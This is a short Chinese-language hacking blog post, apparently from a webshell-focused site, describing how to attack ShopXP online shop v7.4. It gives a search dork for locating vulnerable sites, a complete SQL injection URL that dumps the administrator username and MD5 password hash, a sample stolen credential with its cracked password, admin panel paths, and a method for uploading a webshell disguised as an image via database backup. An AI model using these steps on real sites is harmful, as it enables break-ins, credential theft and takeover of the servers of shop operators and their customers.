shopxp網上購物系統 v7.4 SQL注入漏洞

關鍵字:inurl:shopxp_news.asp

注入代碼:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

爆出用戶名和密碼 注意:用戶名和密碼是連在一起的,後十六位是密碼MD5加密 adminb1481eca94b12f75 =====admin b1481eca94b12f75(38983806 )

後臺:/admin 或者/admin_shopxp

拿webshell方法:把小馬改爲圖片格式後綴準備上傳,利用數據庫備份搞定webshell

文章來自: WebShell'S Blog 本文地址:http://www.webshell.cc/3672.html

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章